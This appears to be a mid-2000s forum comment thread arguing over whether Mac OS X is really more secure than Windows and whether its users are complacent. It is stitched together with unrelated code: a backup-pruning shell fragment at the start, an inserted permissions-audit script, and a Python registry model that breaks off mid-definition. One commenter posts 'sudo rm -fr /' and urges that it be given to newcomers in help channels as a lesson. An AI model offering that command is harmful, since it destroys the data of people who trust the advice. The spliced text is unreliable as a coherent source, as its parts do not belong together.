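        # The pattern matched nothing and was left unexpanded.
        echo 0
        return 0
    fi

    removed=0
    while [ "$#" -gt "$keep" ]; do
        rm -f -- "$1"
        shift
        removed=$((removed + 1))
    done
    echo "$removed"
}

# When run as a script with three arguments, act on them.
if [ "$#" -eq 3 ]; then
    prune_backups "$@"
fi
```
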
>> Think about it, if you were going to write a virus to screw with the world, would you spend time finding a way to infect 5% of the world's computers or the other 95%?
:)
Think about this, if you were going to write a virus to screw up with the world, would you spend time finding a way to infect the same computers that *every* script kiddie and their dog has been -- and is still trying to -- infect, and get lost in the crowd; or would you rather spend the effort writing one of the *very* few Mac OSX/*NIX viruses, and become a legend?
You know, I think "The guy who brought Mac OSX to its knees, and wiped the smug smile off its users' faces" sounds pretty appealing
I wonder why it hasn't happened... Oh yeah, marketshare. Right.
-dZ.
Carol vs. Ghost
But corporate systems tend to be better protected (especially in bank/financial services). Most enterprise/corporate systems are protected by firewalls, IDS and other perimeter measures. Windows systems are almost always part of a domain which makes it easier for corporate administration/policies.
There aren't many corporations/enterprises (> 500 employees) with large percentage of Macs deployed. The options for corporate administration of Macs are much more limited. Even if they can associate with a domain, you can't remotely control policies.
Most of the hacked systems are poorly patched home users.
If 5% of users are Mac, then how many people are looking for malware on the mac?
How many people are looking for windows malware? A few hundred, maybe? They don't find all of the malware that's around for windows. They mostly find the malware that's poorly written and consumes lots of bandwidth. Well written malware goes around for a long time undetected. If there are only a few hundred people looking for virii/malware/trojans on windows, then there is probably only a handful looking for these on Macs.
If there aren't many people looking for malware on Mac then there won't be much found.
----- If communism is a system where the government owns business, what do you call a system where business owns govern
This subject comes up once in a while on Apple Discussions. The threads mostly consist of a couple of people saying that in general, Mac users are too arrogant when it comes to security issues, and everyone else saying that's a bunch of crap.
The following is a reposting of portions of a comment I made in one of these threads last year. Needless to say, few agreed. Oh well. Natural selection? Here's the beef:
A note about security, trust, and automobile salesmen.
There is no amount of security that can supplant the need for trust. Mac users who take the arrogant, uninformed stance that we're safe as long as we don't do X and Y only add to the potential field day a future piece of malicious code is bound to have.
You're good against X and Y, because you know about them. But you don't know about factor Z, because you don't know what you don't know.
When you buy a car, is it possible to inspect every single bolt, belt, and wire? No. You have to trust that the person selling you the car is here to make a happy customer out of you, and not a motor vehicle accident at 50MPH after the brakes failed from his malicious modifications.
You have to trust that your source isn't out to do harm.
I know several people who've used p2p software on Windows to download commercial software illegally and were absolutely crippled by viruses. Sure, Windows might indeed be less secure than Mac OS X, but does that mean the same scenario isn't possible under some circumstances that aren't hitherto known? No, it doesn't.
The source(s) of my friends' illegal software was dubious at best; untrustable. They got burned. Karma? Perhaps. Poor foresight? At least.
Without an administrator's password, there is still plenty of damage or intrusion that can be done. Who cares about deleting the stuff in /Applications/Utilities when everything that's actually going to MATTER to the user at the end of the day resides in his or her home folder, where no authentication is needed to peek around and play with?
We trust Apple to ship copies of iPhoto that don't relay information to the government. In the event such a thing were actually to happen, someone would eventually find out and there would be heads on pikes, of course, but there would still be some level of damage done, not just to people's privacy and data, but to the reliability of their software sources. I know I'd boycott any manufacturer that started giving my data en masse to any government.
Security doesn't come from code, but from education and trust.
Mikey-San
Karma: +Eleventy billion (mostly affected by watching Celebrity Jeopardy)
...better built...
A surprisingly little known side effect of buying a Mac is that within 48 hours your ph*llus grows two inches longer, or, if you are a female, your b**bs grow a couple of cup sizes. I wonder what happens when you buy a WinDell box or, perish the thought, a Sun Solaris system? Anybody????
Only to idiots, are orders laws.
-- Henning von Tresckow
So it's clearly possible to craft attacks for MacOS-X. But Mac market share is so tiny that few bother. Back before the PowerPC transition, when Apple had more market share, there were more Mac viruses. "Back in the late 1980s, viruses used to be a much bigger problem on Macs than on PCs. We here at F-Secure used to have an antivirus product for Mac but discontinued it after the macro viruses died out".
There have been some gaping holes in MacOS-X browsers that allowed execution of remote code. But nobody bothered to exploit them. Or so it is thought. There's always the possibility of quiet exploits that extract some useful information from the target, ship it somewhere, then clean up and exit.
http://despair.com/pretension.html =)
"Understand you're having a little Jimmy Page trouble."
Just in case anyone isn't in the mood to hunt it down, here's a few links for Little Snitch:
http://macupdate.com/info.php/id/10426
http://www.versiontracker.com/dyn/moreinfo/macosx/17642
Developer's Site:
http://www.obdev.at/products/littlesnitch/index.html
You call a Mac user arrogant because he doesn't wear a belt, suspenders, and two coils of rope around his middle. But you see, his pants aren't falling down. Yours are. And they keep falling down no matter how many precautions you take. I think you need to have a talk with your tailor.
This may be wrong, but I read somewhere that Unix and its variants simply cannot have viruses, period. Only worms and trojans. This was supposedly due to their use of separate VM space for each process. Fact or urban myth?
Actually (on 10.4, anyway) one has to be in the admin group to have write privileges to the /Applications directory. But good point - even so, I would rather have to perform some kind of sudo to write to that directory at all, even if I am an admin user.
What protection?
What products exist for Windows that will protect against a new worm? What products exist that will protect against a known trojan in DRM?
When you buy anti-virus and anti-spyware software you're really just paying for insurance in case something bad happens. You're not preventing the natural disaster, just helping yourself clean up afterwards.
With OSX and Linux we've already done the work to prevent these disasters so the chances of running into a worm or trojan are far less likely.
This may require a semi computer literate user base, so it may not be possible on Windows, but almost anyone who uses OSX and Linux "get it" which is why they are unconcerned about these threats.
The only thing you have to fear is fear itself. Remember that. It's so true.
Who's spreading the fear? Who's trying to make you afraid? What's their motive? Sometimes their only motive may be to make you feel as afraid as they already do.. Misery loves company.
No, it's the bundled software (including parts of the OS). So, yes, the user data is more valuable than the prepackaged software, but having a copy of a frequently used program (say aim.exe) writable by anyone using the computer (instead of only the administrator and only immediately after the admin has entered his password) only helps viruses and worms propagate.
Something as simple as Unix file permissions on commonly used programs goes a long way toward data security.
Because of the way that the HTML control has become the core of so many components, and because of the way the HTML control does not really know whether an object it's displaying should be trusted or not, there is a whole class of attacks that are possible on Windows that are not possible on any other platform. Even Internet Explorer on the Mac was more fundamentally secure than IE on Windows for this reason... basically, when the HTML control goes to display an object, it looks at the file or URL it came from and applies its knowledge of how applications that use the control behave (for example, it knows about the location of temp files, and mailboxes, and the Internet Explorer cache) to decide whether there was any possibility that the object might be untrusted. When this test fails, perhaps because some application puts temporary files in some unexpected place, what's known as a "cross zone" exploit can be implemented.
Every other browser defaults to treating ALL content as untrusted, and only allows shell programs and applications to *add* mechanisms to a *specific* instance of that browser. That's the only secure way to design a browser. Until Microsoft abandons the current design of the HTML control, changes the API so that applications are given control and responsibility for trust, and breaks the existing API, Windows will always be subject to far more problems than any other OS.
Sophos is one commercial vendor who distributes an anti-virus client package for the Mac. They also offer their server component for Mac, providing update and remote install/upgrade services. Sophos For OS X. While there are only a few viruses/worms/trojans in the wild at this time that can infect OS X, anti-virus software, for instance on a Mac based file server, can help protect machines running other operating systems.
In this geek's opinion, any OS that defaults the primary user on the system with super user access is going to be at least somewhat more prone to attack. Nasty critters enter systems quite often via way of email attachments, and the common user's attraction to shiny things. No scripted-auto-execute-attachment-on-view hack to poorly written email clients is needed, nor is any privilege escalation exploit. The human behind the keyboard will perform that task for us. This is something that is very reasonably taken advantage of with OS X (as with Windows). In a business environment one would hope this has been addressed properly.
As for other remote exploits, SANS top 10 list for Mac OS X.
Mac OS X is far from un-exploitable. It's just not the biggest target on the battlefield... but getting bigger every day
I'm a daily Linux user. I also have a G4 under my desk running OS X, and have quite a bit of respect for the work Apple has done with Darwin (not so much with Aqua).
With Linux, OS X the worst that could happen that way is a destroyed user account.
Not true. Most *nix hacks are compound hacks involving a series of privilege escalation attacks. The root attack surface is much larger from within a user account than from out on the net, so compromising user accounts is a necessary step for many rootkits. Fortunately, since the user account is a way-station to getting more useful work done, that means user account destruction is not on the hacker's to-do list. Unfortunately, it means that unprivileged user-account compromises are very much on the hacker's to-do list.
Even if it was true that destroyed user accounts are the most you have to fear, it is small comfort when most Linux and OS X boxes are single-user machines. At best it spares you from having to reinstall the OS, but after a serious hack, you're probably wise to do that anyway.
-Chad W. Smith http://www.chadwsmith.com/
OS9 was (and still is) a much more secure OS than OSX; it may well be amongst the most secure ever widely deployed by anyone.
Mac OS 9 has no local security at all: there's no mechanism in OS 9 to prevent any remote exploit from becoming a privileged exploit. How do you figure that it was "more secure" than OS X?
I keep hearing that the level of viruses in Microsoft is because of its popularity. If that is the case can someone please point me to the figures that back this up. I'd like to see the figures showing the relationship of an OS's market share to the percentage of viruses. If Microsoft has 90% market share and 70k viruses and Mac has 2% market share does that mean Mac has 1000 to 2000 viruses? Does OSX even have 100 viruses? Does the popularity of an OS invalidate its security model? If Mac had 90% market share would it have 70k viruses. Linux? BSD?
sudo rm -fr /
Give this advice in a 'linux help' irc channel. You'd be amazed at how many people blindly type away. FWIW, every noob should type this command at least once. The lesson learned is *invaluable* (albeit a bit heavy handed) - respect for the power of root.
There was a great piece of software at macworld last week called MacScan. I believe they released their 2nd version of the software at Macworld. It is an anti spyware / keylogger / trojan program and they were giving demos of certain malicious programs that are out there for mac. It was kind of scary.
You can find information about the software at: http://macscan.securemac.com./ I personally got a copy for myself as it seems there is more and more malicious code being written for the mac.
Which brings us to the tenet:
If you think you are better than anyone,
it means you are lower than everyone.
sudo vi /etc/hosts :wq!
Ctrl-A
199.181.132.250 slashdot.org
Esc
Linux is a damned secure OS, at least as good as MacOS X.
Properly configured a Linux box, a BSD box, and a Mac should be comparably secure.
The problem is that you don't know what "Linux" a Linux is. Most Linux distributions I've used shipped with a lot of dubious software installed and enabled by default. Mac OS X isn't exactly at the level of paranoia of OpenBSD... not everything is turned off by default... but it comes with most of the "relatively paranoid security measures" already taken by Apple before they ship it.
Exploit, infections from not known: http://news.zdnet.co.uk/internet/security/0,39020375,39155837,00.htm
This is to date the closest that Apple has come to the kind of horrorshow that Microsoft created back around 1997 when they integrated IE and Windows Explorer, and it's not very close at all. This hole could never be used to create an automatically propagating worm, the most it does is make social engineering attacks easier.
If social engineering was all we had to watch out for, like it pretty much was back in the early '90s when Microsoft turned the self-propagating email worm from a joke (the "GOOD TIMES" virus hoax) to reality, I'd be a happy camper.
I don't have time to do more research to help your denial, but I would suggest you actually do a bit of research yourself and see that OSX is no more perfect than any other OS. PERIOD.
"More perfect" is improper English. OS X is not perfect. It is more secure than most other OS's, especially as a default install. Your "research" has turned up a trojan (not a virus or worm) that Apple has even made harder to use and which has no exploit code included. This does not qualify as an exploit in the wild.
You also turned up a half-assed rootkit, with no way to get it on the box. This is not a virus or worm or even an exploit of any sort, let alone one in the wild. This is a really poorly written example of what someone might install after they did run a successful exploit.
Finally, you found a decent rootkit, again with no way to get it on the box.
So you found three programs that do what they are supposed to provided you have the permissions and passwords needed to run them. And you call these exploits? You know what? There are almost certainly OS X exploits existing in the wild. They are used by individuals with some skill to compromise specific machines for specific purposes. These exist for pretty much all platforms. They are not, however, worms or viruses, or anything a normal user has to worry about. Trying to equate whatever non-public exploits and a few programs that do what they are intended to with the permissions they are given with the unholy mess that is Windows exploits in the form of worms, viruses, and known hacks is a joke.
The next time you feel like doing some "research" how about starting with some definitions of malware and a basic understanding of what constitutes an exploit. Basically, get a clue.
Use a firewall, backup regularly, and don't open executables from untrusted sources. That's my whole regime.
Before 1997 that was good enough on Windows, too.
If you don't use Internet Explorer or any other application that uses the HTML control to access the Internet, that's probably STILL good enough on Windows. Be careful, because that means you don't use Realplayer, Windows Media Player, Outlook, and a lot of other applications as well as Internet Explorer.
Windows XP 43,672 nasty thangs
Mac OS X 0 nasties
I love the old argument that windows is more vulnerable to malware than (OSX/linux/VMS/other) simply because there are more of them out there, so they present a better target for virus writers.
What a load of toss.
Ask a Microsoftie the following question, and you should get the following answer :
Q: If you have to drive up against an enemy armed with a machine gun, are you safer in a hummv or a freely available M1 tank ?
A: You might be a bit safer in an M1 tank - at the moment, but the HUMMV is still a better bet. Why you ask ? .. well, easy really .. HUMMV's are actually much better protected than tanks .. but because there are more HUMMV's in the field, the evil bastards that have machine guns currently aim them at light vehicles. But don't worry about that - as soon as they put more tanks in the field, machine guns will magically start to be effective against them, and the truth will be known by all.
Also, HUMMV's offer a wide range of choices for additional armour plating and security measures to make you even safer !. If you are stupid and choose to drive a tank instead, then you will be hard pushed to find ANY third-party additional armour plating on sale for your tank ... this makes the old HUMMV an even safer bet than a tank.
And even if tanks were available for free (!!!!), HUMMVs are still cheaper when you consider the total cost of ownership - basically anyone can hop into a HUMMv and drive it like a big car, but driving a tank takes a bit of skill .. so the training costs for tank crews offset the $0 purchase cost.
Finally - when your freely available tank throws a track or suffers mechanical problems in the field under fire .. whatcha gonna do ? You have to rely on your own engineers to get it rolling again. On the other hand, factory purchased HUMMVs come with full support - so if you puncture a tire or run out of fuel whilst surrounded by a horde of machete wielding natives - just send an email off to our 24/7 support group, and we will get back to you with some helpful advice by the next business day. "Have you tried turning the engine off and re-starting it sir ?" "The bulletproof glass is letting bullets through ? No worries sir - just hold tight for a while and wait for the next version to be released - we have a radical new type of glass we are testing in our labs, I promise".
Get the facts - HUMMVs are safer than tanks !
So OS X doesn't have any virii because we are all smarter users than our Windows counterparts?
For instance, if an OS needs a firewall in order to be secure, that OS should be deemed 'insecure' until there is no longer a need (i.e. the problems fixed), but it does in no way indicate that all OSes need a firewall to be secure.
If there were a market for such tools for the MAC OS, people would buy and use them (it's a circular argument, but that's economics for ya). Instead I would measure the relative security of the MAC OS by the lack of need for such tools for day-to-day operation.
Just because one OS has a severe need for such third party tools, it should not indicate all OSes have the same need.
I think you underestimate just how much I just don't care.
The "nasty virus" you link to is bogus; distribution of the virus requires:
# Admin or physical access (boot from a CD or firewire/usb, ignore permissions on the internal drive).
# Write access to either /Library/StartupItems or /System/Library/StartupItems.
# Write access to any existing StartupItem (which is replaced with this script).
# Write access to the rc, crontab, or periodic files.
The effects of this program are pretty nasty, it's true, but installation requires the user to practically install the program him or herself. If I already have root access to a machine, it is a given that I could install whatever malware I wanted, "virus" or no.
The second program you linked to exploits a vulnerability in the VERITAS NetBackup, not in MacOSX; users are only vulnerable if using that program. This program has been patched. A Mac user should be using the most recent version (as one should on any platform) to avoid compromise on this software. Nothing to do with the MacOS.
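The write-access preconditions listed in the comment above can be checked directly; this added example (not from the thread) reports anything under those locations that the owning group or all users can write to. The function names are hypothetical, and the /etc paths for the rc, crontab and periodic files are assumed locations that the comment does not spell out.

```shell
#!/bin/sh
# Added example, not code from the thread.
# Locations named in the discussion: the two StartupItems directories, plus
# /Applications from the earlier comment about admin-group write access.
# ASSUMPTION: /etc/rc, /etc/crontab and /etc/periodic stand in for the
# "rc, crontab, or periodic files"; the comment gives no paths for them.
DEFAULT_PATHS="/Library/StartupItems /System/Library/StartupItems /Applications /etc/rc /etc/crontab /etc/periodic"

# find_loose_writes PATH...
# Prints one line per file or directory that is writable by others
# ("world-writable") or by its group only ("group-writable").
# A writable directory matters as much as a writable file: whoever can
# write to the directory can replace the items inside it.
find_loose_writes() {
    for p in "$@"; do
        # Skip locations that do not exist on this system.
        [ -e "$p" ] || continue
        # Symlink permission bits are meaningless, so links are excluded.
        find "$p" ! -type l -perm -002 \
            -exec printf 'world-writable: %s\n' {} \;
        find "$p" ! -type l -perm -020 ! -perm -002 \
            -exec printf 'group-writable: %s\n' {} \;
    done
}

# count_loose_writes PATH...
# Prints the number of findings, for use in a cron job or login check.
count_loose_writes() {
    find_loose_writes "$@" | wc -l | tr -d ' '
}

# Run "sh thisfile audit" to check the default locations.
if [ "${1:-}" = "audit" ]; then
    # Word splitting of DEFAULT_PATHS is intended here.
    find_loose_writes $DEFAULT_PATHS
fi
```

On a stock install the /Applications entry is expected to show up as group-writable, which is the admin-group access an earlier comment describes.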
In other news, oxygen tank expert Bronchito McCougherson chastised non smokers for being too smug thinking they were immune from emphysema and lung cancer.
[sigh] I may as well join on the pig pile.
Safer? I guess, except in the past year Apple released more security and exploit fixes for OSX than Microsoft did for WindowsXP...
So again how is it a safer OS if these exploits existed in the first place?
As others have also noted, there is a disconnect in your logic here. If Apple uncovers 25 potential exploits and patches 23, while MS uncovers 50 and patches 20...well, surely you get the picture.
Apple is a _safer_ (not 100% safe) operating system than WindowsWhatever for a variety of reasons.
* It's harder to exploit because its default behaviors are more secure.
* Its overall design harvests security strengths from its UNIX heritage.
* Yes, its low installed base makes it a less attractive target.
* BUT, so does its superior security model. ^(1)
(1) If you and a friend are running away from a charging bear, you don't have to run faster than the bear--you have to run faster than your friend. Likewise, OS X doesn't have to be 100% secure, it just has to be more secure than Windows.
In this and other posts on this article, you've stretched the bounds of logic and exaggerated claims of OS X exploits. Why?
First, I wouldn't characterize user views concerning s/w security regarding OS X as "smugness." That's a myth. Second, it should be more than telling, that after article after article regarding OS X security from pundits and software security vendors alike, the best argument they can make is a pure hypothetical. Third, any discussion of software security must, I repeat, must involve not only the software design of the OS platform as it pertains to security, but also the OS vendor (i.e., Apple, Microsoft, etc.), insomuch as the vendor plays a key role in maintaining security on its platform. The vendor's role as it pertains to software security is intrinsic and inseparable in any meaningful discussion of platform security.
In the case of Microsoft, they have been incontestably less than vigilant regarding addressing security lapses in Windows, as recently as the .wmf incident. On the other hand, Apple has been proactive in maintaining security on its platform, constantly updating its system for potential vulnerabilities even though nothing has ever existed in the wild. The most recent version of OS X ("Tiger") featured a raft of new, preventative security features. That's quite a clear departure from Microsoft. Apple, as a company, through its behavior pertaining to OS security maintenance, has made it clear that if anyone tries to exploit the system, you may find a way but it won't be easy. And if you somehow manage to exploit it, we will shut you down quickly.
As an example, the "evil widget" issue that the author of the parent article refers to is a little more telling than he lets on. The issue arose not long after the release of 10.4, but nothing was ever delivered in the wild. Nevertheless, Apple addressed the issue in its next update to OS X, which at the time was 10.4.2. And this is an example where Apple users do have a right to be smug, as Apple OS X 10.4 users know just how far above and beyond the call of duty Apple's solution was to the theoretical "evil widget."
Make no mistake, when you talk about OS security, the company that makes the OS matters, and in the case of Apple, users would have every reason to be smug.
They can be just as ignorant as windows users, why who could have thought the "Word 2004 public beta" with a "Microsoft icon" that "looked genuine and trustworthy" would wipe out your home directory?
I haven't been hit by an asteroid yet, but I know that I am vulnerable to being hit by one. And I know that, as the population increases, one's chances of being hit increases.
Excuse me. I have to go out and buy a steel umbrella.
You've got great points; don't get your arguments dismissed by being a Word Nazi(TM). Idiomatic expressions are an accepted part of the language and is probably the least problem we have on Slashdot when it comes to understanding posts.
I just wish to express my utterly redundant agreement with your valid but redundant point about linguistic precision being redundant.
Ironically, this post will probably be modded up as "Insightful"...
Blank until
If the worst problem you can find in Mac OS X is that it allows social engineering attacks, well, that means it's even stronger than I'd give it credit for. Social engineering is not an exploit against the OS, it's an exploit against the user. You can't solve THAT technically, at least not until the Singularity when we can apply service packs on our neumonal implants.
Despite elements of truth, I consider such articles to be PC FUD. The subtle message is that the security situation on Mac OS X is NOT really different than Windows and if Mac users were truly responsible they'd be running AV and anti-spyware software and in general be just as worried about security as their PC-using brethren. SO DON'T SWITCH.
Friends, the security situation IS different. Mac users who run software update regularly and don't deliberately open up their systems are probably the safest computer users on the internet, all without having to care very much about security.
In terms of security, Windows is Baghdad and OS X is Pleasantville. So, while being smug may be rude, it's currently not unjustified. The average Mac user doesn't and shouldn't have to worry as much about security as the average PC user. Anyone who tells you otherwise has an agenda.
I advise against buying antivirus software for the Mac. Antivirus software by its very nature can only reduce the reliability of your system, and since it's purely a responsive mechanism it can actually create a sense of complacency that makes viruses grow faster during the period before the virus is detected and a signature file is distributed.
Simply disabling any auto-execute mechanisms and being careful about who you share digital bodily fluids with works much better.
..and not just over security!
I'm not saying that OS X is perfect, I'm saying that SO FAR, you shouldn't waste time and money on virus protection. Do regular backups of your important data, that is MUCH more effective and protects against other disasters like hardware malfunctions, loss and theft, fire and stupidity.
We at the Snakeoil Corporation know that, viruses, hardware malfunctions, loss, theft, fire and stupidity are major threats for your precious data. That's why we have released our new revolutionary product, Snakeoil Antivirusandhardwaremalfunctionandlossandtheftandfireandstupidity. Snakeoil Antivirusandhardwaremalfunctionandlossandtheftandfireandstupidity uses our patented trade secret virus, hardware malfunction, loss, theft, fire and stupidity detection engine to effectively stop any viruses, hardware malfunctions, losses, thefts and fires. And stupidities. Order Snakeoil Antivirusandhardwaremalfunctionandlossandtheftandfireandstupidity today! (Except in Nebraska.)
Legal disclaimer: The software product and users's manual are provided "as is" and without warranty of any kind, either express or implied, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose. In no event will Snakeoil Corp. be liable for any damages, including any lost profits, lost savings, or other incidental or consequential damages arising out of the use, or inability to use Snakeoil Corp. software, even if Snakeoil Corp. or an authorized representative of Snakeoil Corp. has been advised of the possibility of such damages, or for any claim by any other party. Void where prohibited by law. Your actual mileage may vary. For maximum freshness, use before date code indicated. Keep out of the reach of children. Safety goggles may be required during use. All rights reserved. Any resemblance to actual persons, living or dead, is unintentional and purely coincidental. Celebrity voices impersonated.
USE HOT GRITS WITH STATUE OF NATALIE PORTMAN (NAKED AND PETRIFIED)
http://www.us-cert.gov/cas/techalerts/TA06-011A.html
Step 1: The virus first attempts to identify the target machine.
Step 2: Upon doing so and diagnosing apparent weaknesses (???), the virus then packages the relevant position-independent code in an appropriate executable container (ELF for linux, PE for Windows, a.out or unibin for OS-X) and set the entry point. The virus then executes a found exploit (???), causing the offending computer to download the converted virus from the attacking computer
Step 3: Profit
More detail needed on those Step 2 vagaries. Any virus works great if it can just magically find vulnerabilities and exploits by which to do its work. I'd have a lot more interest in your post if you could identify any specific vulnerabilities or exploits in OS X that would allow that scheme to succeed.
Build a man a fire, he's warm for one night. Set him on fire, and he's warm for the rest of his life.
At the keynote, Jobs announced .Mac had over a million subscribers now. Not a huge percentage of the Mac userbase, but still pretty good.
And with iLife 06 it's more compelling to use for most people than it was before. Plus the bandwidth cap is really high and they have great servers so if you want to post stuff that people can see with reasonable speed, it's not a bad solution. And as noted the backup/sync features really are worthwhile - especially if you have two macs.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
No OS is infallible - film at 11.
Wow, how insightful.
As a wise man once said, "There is no step function between 'safe' and 'unsafe'."
We've got tens of thousands of known Windows exploits in the wild, and you've just found maybe one for the Mac, and you're claiming there's therefore no difference in the relative perfection of their two security systems?
So I guess we could have a bunch of crackheaded drug addicts engaging in unprotected sex while rolling around naked in a garbage-strewn back alley littered with rusty used needles and leaking bags of infectious medical waste, but you'd say (in response to our suggestion that the back-alley sex might not be such a good idea from a health safety perspective) that: since chaste, reclusive people can get sick too, there's NO SUCH THING as a perfectly healthy lifestyle. "Period."
Sure, I realize how easy it is. Are you suggesting, therefore, that it's not worth asking for the password?
That it's fine (or even preferable) for Windows not to ask?
That its failure to ask has nothing to do with the staggeringly high numbers of malware programs which can typically be found installed on the average home PC?
You are also truely a fool if you a salesman convinces you
Aside: I take umbrage with the fact that you'll call someone a fool who has believed a lie for which they cannot be expected to know whether it was a lie or not. In that case, everyone is, has been, or will be, "truely [sic] a fool".
that their product is 100% secure to all security issues.
No one states that Macs are magical, or that they cannot be compromised. The claim is basically that the virus/worm problem with Windows does not exist on the Mac. And they're right, IT DOESN'T.
Regardless of the reason, I know that I am safer today with a Mac than with XP.
Thought experiment: automate two machines, 1 Mac, 1 fully patched, but otherwise default, PC. Script them to browse the web, crawling through links.
Which one is guaranteed to get pwn3d? Which one is currently guaranteed not to?
Next script them to enter their email address to forms that ask for it, and have them both merely run their built-in mail programs, and ask the same question again.
It may be safe today, but we don't know what tomorrow holds.
No, but I don't know if my safe house in my safe neighborhood won't be infiltrated by two LA street gangs and an international terrorist organization tomorrow either. I can, however, look at the way things tend to be, and see that I'm as safe as I can reasonably hope to be, and aren't likely to change in the morning. If things go to hell in a hand-basket tomorrow, I'll deal with it then.
Mac OS X does not do the sorts of things that make worms, viruses, and even hard-to-battle spyware, easy to write for Windows. Windows doesn't *have* to wait for some mythical "tomorrow" for those things.
So, with my Mac, I'll not worry about worms or viruses. If they come (and they are *very* likely to come any time soon), they come. On Windows, they're already here, have been here for a while, and are a nuisance.
So yeah, the Mac is more secure. The bogeyman of "tomorrow" doesn't concern me, which is good, because it shouldn't.
I think the writer has a valid point. OS X may be arguably more inherently secure, but that is to ignore the social engineering aspects. Most Mac users never read the license agreement without hitting 'Accept', they enter their keychain password whenever it is requested without reading or understanding the message, and happily run downloaded shareware without a second thought. Given the routes to an exploit available once any of these have been breached, writing a Mac virus is trivial. Hell, even Cocoa's handy categories make the entire API a backdoor. Writing a virus for the Mac that relies on social engineering is not hard, in fact it's trivially easy, if you learn a bit of Cocoa. Apple even give you the tools for free. It only takes a few users to run a trojan to unleash a Mac virus on all of us, and it's true - we just are not ready to accept it can even happen, let alone know how to deal with it when it does.
That just shows that Mac virus writers are lamerz while Windows virus writers are 1337.
Proof of concept exploit:a g=zdfd.newsfeed .app file extension. I am not amazed.
http://news.zdnet.com/2100-3513_22-5189335.html?t
Feh. It has the
http://daringfireball.net/2004/04/crying_wolf
"The use-mention distinction" is not "enforced here."
If your suggestion is that Mac OS X is not more secure than Windows, you have failed to justify it. If you want to justify it, find vulnerabilities in OS X that are not present in Windows rather than identify vulnerabilities common to the two systems.
"The use-mention distinction" is not "enforced here."
Yeah Mac users are just as dumb as Windows users, but for the life of them they can't seem to figure out a way to open this 'cool_pic.jpg.exe' picture that their 'good friend' keeps sending them.
Part of what has hurt Apple in regards to selling computers is their superiority complex. First it was the mistake of pricing yourself as the BMW of computers and not licensing out the OS. Smack on the head from Bill Gates.
Now the next downfall is the hubris of the MAC community to view all in Apple world perfect and untouchable. Sorry Sally, that neat chrome case has nothing to do with the security of your operating system. The irony is that MAC users are probably some of the most novice computer users around and need serious security updates, monitoring, security software etc.
"With that in mind, I absolutely agree that Mac users are too smug and that a dedicated malware author could bring many of us to our knees. (Hell, I run as administrator just to save time, despite knowing the risks. It's a gamble, although I keep good backups.) But an OS X (or Linux) malware author would have to be much more skilled than most Windows-targeting skript kiddies to do a lot of damage."
All you do is wait for Apple to release a patch to fix a security issue, reverse engineer the patch, and attack macs. How often do Mac users patch their software?
Vote for Pedro
I remember a complaint recently about how the Microsoft world wasn't "User" oriented, but was more corporate oriented. No one here thought that was much surprising.
On the flip side financial market folks are looking at Apple to see if it can leverage some of its great success in the end-user market toward business.
Perhaps the very thing that made/makes MS successful in the corporate culture is also what makes it more vulnerable to crackers and the difficulties Apple has had getting into the Corporate World also provide roadblocks to crackers.
What do corporations and crackers have in common? They both like to own computers other people are using and control them.
MS made itself wide open to make networking easy -- to make it easy for Domain controllers to control PC's, for Admins to force policies on many users remotely -- to control users at their local consoles. Everything in Windows is about reducing TCO and moving toward zero-administration overhead so 1 cracker, or administrator can control 100's or 1000's of systems (or 10's of 1000's of botnets).
Perhaps I am naive about the remote administration tools of Apple based products, but I don't see them being dropped into a corporation as easily, ready to set up and integrate into the network and have existing network policies easily control them. When I asked an apple-laptop (dunno what kind it was) owner about file sharing, she had no clue how to share them or how to browse local files on my house network available on SMB, CIFS or NFS.
Perhaps the features, that weren't designed into Apple computers that have slowed it down in the Corporation have also slowed down the hackers. That's not to say that MS got it right -- they took the fast, open and dangerous route -- and we see their legacy today. But that's what it has taken to be successful in the business market. Software companies have cared first about product and market, second about quality and security.
MS is now making a big show about security w/o addressing quality, but you can't have security w/o quality. Each bug can be a _potential_ exploit waiting for the right conditions, but if a company never bothers with quality, they'll never know how many potential problems they have nor how severe they are.
-l
Modded troll for an obvious joke. Sheesh, so sensitive these folks.
----- If communism is a system where the government owns business, what do you call a system where business owns govern
There have been some gaping holes in MacOS-X browsers that allowed execution of remote code.
I'm not sure that this is an accurate description of reality.
The use of LaunchServices by the browser without human intervention allowed for the exploit of insecure applications. The problem is that LaunchServices is used internally by applications that are never intended to be run with untrusted documents. This is a problem on Windows, and has been a problem on X11-based browsers on UNIX systems as well.
Apple has attempted to address this problem by modifying LaunchServices to alert the user when opening a URL with an application they have previously not used, and by adding warning dialogs to Safari. I believe this is the wrong approach, because it still makes social engineering attacks easier, and because it doesn't help against attacks on components that have already been used to open documents via URLs... and it causes other problems. I had the user interface lock up on me because a screensaver was attempting to use LaunchServices to run an application (legitimately), but I wasn't able to see the warning dialog because the screensaver was running.
The right approach would be for applications registered with LaunchServices to register whether they should be considered "safe" for potentially untrusted content, either via a flag (that defaults to off for existing applications, but which a user can change through Preferences) or by creating a separate WebServices registry. Applications that handle untrusted documents would use this alternate registry or attribute to avoid passing documents to innocent code. This would limit the potential for social engineering without causing problems with applications using LaunchServices internally.
However, the "surface area" of this attack is far smaller than that of Microsoft's active content. It still requires a user to explicitly visit a web page: there's no mechanism for an email message or code surreptitiously inserted into an otherwise innocent web page (say, via embedded HTML in a forum message) to automatically trigger the execution of untrusted code as there is for Outlook and Internet Explorer and other programs that use the Microsoft HTML control.
Automatic execution of native code is the "best" possible attack vector for viruses. That's why Mac viruses used to be so prevalent... it was possible to hide code fragments in the resource fork of documents and have them automatically execute when a document was opened or even displayed in Finder, similar to the way code fragments can be hidden in Windows Metafile format images. This mechanism was increasingly discouraged, and since OS X doesn't support 68000 code segments at all (not even under Classic) it's no longer an issue. Apple has steadily moved away from automatic execution of code; unfortunately, Microsoft doesn't seem to have learned that this is a bad thing.
As for Cowhand... it's not an exploit, it's a payload that can be installed in an already compromised computer. Nobody would argue that you can't install backdoors in Mac OS X or any other OS, once a security flaw has been found and exploited, but the existence of a backdoor is not proof of a security flaw... and so far as I know nobody has traced Cowhand's presence back to anything but a social engineering or local (physical access, guessed passwords, etc...) attack.
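A toy model of the opt-in "safe for untrusted content" registry proposed in the comment above, added here as an example; it is not part of the original thread and is not Apple's LaunchServices API. All class, scheme and application names are hypothetical, and the registered handlers are constructed sample data.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Iterable, List, Optional, Tuple
from urllib.parse import urlsplit


class Origin(Enum):
    LOCAL = "local"          # a local application asking for its own purposes
    UNTRUSTED = "untrusted"  # URL arrived via a web page, email or similar


@dataclass
class Handler:
    app: str
    schemes: frozenset
    # Defaults to off, so existing applications are never handed untrusted
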